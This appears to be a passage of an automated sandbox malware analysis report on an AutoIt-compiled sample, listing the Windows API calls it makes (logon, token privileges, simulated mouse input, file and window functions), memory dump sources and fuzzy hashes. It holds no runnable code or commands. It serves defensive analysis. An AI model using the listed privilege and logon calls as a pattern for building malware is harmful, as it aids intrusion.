                                                            • FreeSid.ADVAPI32(?), ref: 006E879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                            • Instruction ID: e5eb9e72202c83817519e1b1cc5369e45c8257caeb8b07cd9f00af71d3f8a7b4
                                                            • Opcode Fuzzy Hash: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                            • Instruction Fuzzy Hash: 41F04975A1130CBFDF00DFF4DD89AEEBBBCEF08211F1084A9E901E2291E6756A448B54
                                                            APIs
                                                            • __time64.LIBCMT ref: 006F889B
                                                              • Part of subcall function 006B520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006F8F6E,00000000,?,?,?,?,006F911F,00000000,?), ref: 006B5213
                                                              • Part of subcall function 006B520A: __aulldiv.LIBCMT ref: 006B5233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eu
                                                            • API String ID: 2893107130-3822003923
                                                            • Opcode ID: 12a0ad0ddfc7becaf02dd252299b6495fa9feb9435765e63c2aba1fef05ad7de
                                                            • Instruction ID: 61ad08009b64492266cc41d68f2b461dab2035dc9adaa24c67f691efc45b3e4a
                                                            • Opcode Fuzzy Hash: 12a0ad0ddfc7becaf02dd252299b6495fa9feb9435765e63c2aba1fef05ad7de
                                                            • Instruction Fuzzy Hash: 5821B4726356148FC729CF35D841AA2B3E2EFA5311B688E6CD1F5CB2D0CA74B905CB54
                                                            APIs
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 006F4CB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID: DOWN
                                                            • API String ID: 2434400541-711622031
                                                            • Opcode ID: 4ad4c8a4c44d00358d5d3393f34df38a1b991f6bfdfd1f53dfdcbe139c5c272a
                                                            • Instruction ID: d5116f2fd1efcf5ff39aeb3335e16a0bd5f2b8fe5aaaf37b135eee05ec3c3848
                                                            • Opcode Fuzzy Hash: 4ad4c8a4c44d00358d5d3393f34df38a1b991f6bfdfd1f53dfdcbe139c5c272a
                                                            • Instruction Fuzzy Hash: 3BE08CB219D7223CB9482A19BC13EF7078D8B12735B10120AF910E59C1EE896C8325AC
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006FC6FB
                                                            • FindClose.KERNEL32(00000000), ref: 006FC72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 38daf428856d1922ffe009ceaede86c6bd88da498699b0df58b59634f88778f9
                                                            • Instruction ID: a5a7d2b9a4b607f0b0093c7b146366f9782f16e53ae03b9c3d44578cefc62919
                                                            • Opcode Fuzzy Hash: 38daf428856d1922ffe009ceaede86c6bd88da498699b0df58b59634f88778f9
                                                            • Instruction Fuzzy Hash: EA118E726006049FDB10EF29C845A6AF7E9FF85320F00CA1DF9A997291DB30A801CF95
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00709468,?,0071FB84,?), ref: 006FA097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00709468,?,0071FB84,?), ref: 006FA0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 149301c6b325fbc7eac6e4e7b00dd0dd853e4d2b3773a34fe81e2615502b4f3b
                                                            • Instruction ID: 0a65a2f0c2dafaeee553e60603beafd66f0baeae10e5edbd694d8615a3ebf241
                                                            • Opcode Fuzzy Hash: 149301c6b325fbc7eac6e4e7b00dd0dd853e4d2b3773a34fe81e2615502b4f3b
                                                            • Instruction Fuzzy Hash: 73F0E23510422DABDB20AFA4DC48FFA736EFF09361F008169F918D7181CA309900CBA5
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8309), ref: 006E81E0
                                                            • CloseHandle.KERNEL32(?,?,006E8309), ref: 006E81F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 73170eb09ec0293c0bdc8c0622d84a322f7e26f9f7cdff7ce92c493933496545
                                                            • Instruction ID: fde72bb9f84ca11ba7a88f65ed8a0e7fa227fffeac4853f7628b03362f758015
                                                            • Opcode Fuzzy Hash: 73170eb09ec0293c0bdc8c0622d84a322f7e26f9f7cdff7ce92c493933496545
                                                            • Instruction Fuzzy Hash: 88E0EC72011611AFF7652B65EC09DF77BEAEF04350714C92DF8AA84470DB62AC91DB14
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006B8D57,?,?,?,00000001), ref: 006BA15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006BA163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                            • Instruction ID: 4c89e8386ef48c08879af788833d57eb997205edbe68495228d50cdb18ea6403
                                                            • Opcode Fuzzy Hash: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                            • Instruction Fuzzy Hash: 1BB09231054208EBCA002B99EC09BC83F68FB44BA2F40C020F61D840A0CB6654508A99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                            • Instruction ID: 61be45b606631951f55aef7cdd1e535d1c9bdc9f4bf4b4ebba3f60500aecdf39
                                                            • Opcode Fuzzy Hash: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                            • Instruction Fuzzy Hash: 9F3202A1D29F414DD7279638CD32376A249AFB73C4F15D737E819B5AA6EB28C4C34204
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                            • Instruction ID: 012579cd408e4de3d872a64061aff51a872afb6b8299f24bcfacfb64dd9ff406
                                                            • Opcode Fuzzy Hash: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                            • Instruction Fuzzy Hash: F0B10020E2AF414ED723A6398831336BB5CAFBB2D5F52D71BFC2674D22EB2585834145
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006E8389), ref: 006E87D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                            • Instruction ID: cc71d78a571d8e6110c9bf680d00c43c933df90cb4d464d4768eb32df7ad6651
                                                            • Opcode Fuzzy Hash: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                            • Instruction Fuzzy Hash: 68D09E3226450EABEF019EA8DD05EEE3B69EB04B01F40C511FE15D51A1C775D935AB60
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006BA12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                            • Instruction ID: 63a041da0162bfc313d8ef5c2c202dfcb5437c006ab3692812d989ebbc0eec62
                                                            • Opcode Fuzzy Hash: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                            • Instruction Fuzzy Hash: 31A0113000020CAB8A002B8AEC08888BFACEA002A0B00C020F80C80022CB32A8208A88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f2c77fdc7862b34c7ab930cbba3ddb586d87d8be2d294d125e26b315006cfd9
                                                            • Instruction ID: cb495f13a4a16f543abdf2211f49e037976817ab63bd776374a9431f9b92b241
                                                            • Opcode Fuzzy Hash: 9f2c77fdc7862b34c7ab930cbba3ddb586d87d8be2d294d125e26b315006cfd9
                                                            • Instruction Fuzzy Hash: 3B222930904686CFDF38AA29C4947FD77A3FF42348F24806BD6568B692DB749D92CE41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: db3a295521c6ec304242cd6a2d5c97b6c8e62f97230b6d1f129f37d7d704e23b
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: F6C173B22151930ADB2D4639C4740FEBBE25EA37B135A176DD4B2CF2D4EE20C9A5D720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 05a1af58587e65e37fb7db8cf6453a1e82891a3cb9b0b40c19bbc3784599c448
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: 72C184B22151930ADF2D463A84340FEBBE25EA37B135A176DD4B2DF2D4EE10C9A5D720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: f1d67cb040e52d1fc8129b0ef477110241ef1915096beec576f861a468a0a7b2
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 5DC194B22151931ADF2D4639C4340FEBBA25EA37B135A176DD4B2CF2C4EE20D9A5D710
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: 1a1bc5d7cd19ba1f0804e21d50c9b9ac4cfe51760da4fbeb3cb72b166de85b1b
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: D541E371D1051CEBDF48CFADC890AEEBBF2AF88201F548299D516AB345C730AB41DB50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: dc2e151f3550f8aee3b36a0e6956b96960107102652cc8f1bcdfe9b0576b1014
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 9D019D78A00209EFCB48DF98C5909AEF7B5FF58310F208599ED09A7341E730AE91DB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: c6207b8f9edaf6aab92c097f901ec22e0c5af85cbd72c031d3642c1de91272a6
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: E0019278A00609EFCB44DF98C5909AEF7B5FF58310F208599ED19A7705D730AE81DB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0070785B
                                                            • DeleteObject.GDI32(00000000), ref: 0070786D
                                                            • DestroyWindow.USER32 ref: 0070787B
                                                            • GetDesktopWindow.USER32 ref: 00707895
                                                            • GetWindowRect.USER32(00000000), ref: 0070789C
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007079DD
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007079ED
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707A35
                                                            • GetClientRect.USER32(00000000,?), ref: 00707A41
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00707A7B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707A9D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AB0
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707ABB
                                                            • GlobalLock.KERNEL32(00000000), ref: 00707AC4
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AD3
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00707ADC
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AE3
                                                            • GlobalFree.KERNEL32(00000000), ref: 00707AEE
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707B00
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00722CAC,00000000), ref: 00707B16
                                                            • GlobalFree.KERNEL32(00000000), ref: 00707B26
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00707B4C
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00707B6B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707B8D
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
